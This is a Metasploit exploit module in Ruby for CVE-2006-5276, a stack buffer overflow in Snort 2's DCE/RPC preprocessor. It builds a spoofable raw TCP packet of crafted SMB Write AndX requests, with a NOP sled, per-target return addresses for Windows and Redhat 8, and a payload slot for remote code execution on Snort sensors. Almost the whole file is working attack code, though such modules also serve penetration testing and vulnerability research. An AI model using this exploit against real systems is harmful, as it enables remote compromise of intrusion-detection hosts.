##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2006-5276, a stack-based buffer overflow in the Snort 2
# DCE/RPC preprocessor reached while it reassembles SMB Write AndX requests.
# Nothing here speaks SMB to a server: the module injects a single crafted TCP
# segment onto the wire (Msf::Exploit::Capture / PacketFu) addressed to RHOST,
# so that a Snort sensor watching that path parses it. See 'Description' below.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Capture provides open_pcap / capture_sendto for raw injection; Remote::Tcp
  # is used for the rhost / rport helpers referenced in #exploit.
  include Msf::Exploit::Capture
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, payload constraints, targets and options.
  #
  # @param info [Hash] additional module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',
      'Description' => %q{
This module allows remote attackers to execute arbitrary code by exploiting the
Snort service via crafted SMB traffic. The vulnerability is due to a boundary
error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
which may result a stack-based buffer overflow with a specially crafted packet
sent on a network that is monitored by Snort.

Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.

Any host on the Snort network may be used as the remote host. The remote host does not
need to be running the SMB service for the exploit to be successful.
      },
      'Author' =>
        [
          'Neel Mehta', # Original discovery (IBM X-Force)
          'Trirat Puttaraksa', # POC
          'Carsten Maartmann-Moe <carsten[at]carmaa.com>', # Metasploit win
          '0a29406d9794e4f9b30b3c5d6702c708' # Metasploit linux
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'OSVDB', '32094' ],
          [ 'CVE', '2006-5276' ],
          [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],
          [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      # Payload constraints: 390 bytes of space, NUL is a bad char, and NOPs are
      # disabled because #buildpacket places its own NOPs around the payload.
      'Payload' =>
        {
          'Space' => 390,
          'BadChars' => "\x00",
          'DisableNops' => true,
        },
      'Platform' => %w{ win linux },
      # Per-target values consumed by #buildpacket:
      #   Ret     - return address packed little-endian into the overflow
      #   Offset  - added to the sploit size to form the Write AndX #2 length field
      #   Padding - number of NOP bytes inserted between the SMB tail and Ret
      'Targets' =>
        [
          [
            'Windows Universal',
            {
              'Platform' => 'win',
              'Ret' => 0x00407c01, # JMP ESP snort.exe
              'Offset' => 289, # The number of bytes before overwrite
              'Padding' => 0
            }
          ],
          [
            'Redhat 8',
            {
              'Platform' => 'linux',
              'Ret' => 0xbffff110,
              'Offset' => 317,
              'Padding' => 28
            }
          ]
        ],
      'Privileged' => true,
      'DisclosureDate' => '2007-02-19',
      'DefaultTarget' => 0))

    # RHOST is only the destination written into the injected segment; per the
    # description it need not run SMB. SHOST, when set, is forged as the source.
    register_options(
      [
        Opt::RPORT(139),
        OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),
        OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])
      ])

    # Capture-side options (presumably registered by the Capture mixin) that a
    # send-only module has no use for.
    deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
  end

  # Injects the crafted segment and then hands over to the payload handler.
  # Returns early, without starting the handler, when capture_sendto reports
  # that injection failed.
  def exploit
    # Opens the injection interface; this typically needs raw-socket/pcap
    # privileges on the attacking host.
    open_pcap

    # Source address to forge: SHOST if given, otherwise the local address that
    # would route to rhost.
    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)

    p = buildpacket(shost, rhost, rport.to_i)

    print_status("#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...")

    # capture_sendto's return value is treated as success/failure of injection.
    return unless capture_sendto(p, rhost)

    handler
  end

  # Builds the PSH/ACK TCP segment whose SMB payload triggers the overflow.
  #
  # @param shost [String] source IP address written into the IP header
  # @param rhost [String] destination IP address
  # @param rport [Integer] destination TCP port
  # @return [PacketFu::TCPPacket] packet with derived header fields recalculated
  def buildpacket(shost, rhost, rport)
    p = PacketFu::TCPPacket.new
    p.ip_saddr = shost
    p.ip_daddr = rhost
    p.tcp_dport = rport
    p.tcp_flags.psh = 1
    p.tcp_flags.ack = 1

    # SMB packet borrowed from https://www.exploit-db.com/exploits/3362

    # NetBIOS Session Service, value is the number of bytes in the TCP segment,
    # must be greater than the total size of the payload. Statically set.
    header = "\x00\x00\xde\xad"

    # SMB Header
    header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
    header << "\x00\x08\x30\x00"

    # Tree Connect AndX Request
    header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
    header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
    header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
    header << "\x3f\x3f\x3f\x3f\x3f\x00"

    # NT Create AndX Request
    header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
    header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
    header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
    header << "\x63\x00\x00\x00"

    # Write AndX Request #1
    header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
    header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
    header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
    header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
    header << "\x2b\x10\x48\x60\x02\x00\x00\x00"

    # Write AndX Request #2 (split so the length field can be inserted between
    # `header` and `tail` once the sploit size is known)
    header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\xff\x01"
    tail = "\x00\x00\x00\x00\x49\x00\xee"

    # Return address: the target's Ret packed as a little-endian 32-bit value
    eip = [target['Ret']].pack('V')

    # Sploit: 10 NOPs followed by the encoded payload
    sploit = make_nops(10)
    sploit << payload.encoded

    # Padding (to pass size check)
    sploit << make_nops(1)

    # The size to be included in Write AndX Request #2, including sploit payload
    # (little-endian 16-bit: sploit size plus the target's Offset)
    requestsize = [(sploit.size() + target['Offset'])].pack('v')

    # Assemble the parts into one package. `<<` appends in place, so this chain
    # mutates `header` and assigns that same String to p.payload.
    p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit

    # Let PacketFu recompute the derived IP/TCP header fields (lengths and
    # checksums) now that the payload is in place.
    p.recalc

    p
  end
end